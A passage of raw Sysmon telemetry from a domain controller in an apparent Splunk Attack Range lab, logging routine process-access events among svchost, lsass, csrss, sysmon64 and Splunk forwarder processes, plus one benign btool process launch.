10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001944Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001943Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001942Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001941Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001940Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001939Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001938Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001937Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001936Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0C-5F80-5000-000000007F01}3824C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001935Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3E0B-5F80-4B00-000000007F01}38523848C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{733EE690-3E0C-5F80-5000-000000007F01}3824C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001934Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.683{733EE690-3E0C-5F80-5000-000000007F01}3824C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001933Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.541{733EE690-3E0C-5F80-4F00-000000007F01}37163728C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001932Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.494{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001931Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.494{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001930Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0C-5F80-4F00-000000007F01}3716C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001929Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001928Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001927Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001926Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001925Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001924Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001923Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001922Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001921Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0C-5F80-4F00-000000007F01}3716C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001920Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001919Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3E0C-5F80-4E00-000000007F01}37763768C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{733EE690-3E0C-5F80-4F00-000000007F01}3716C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program 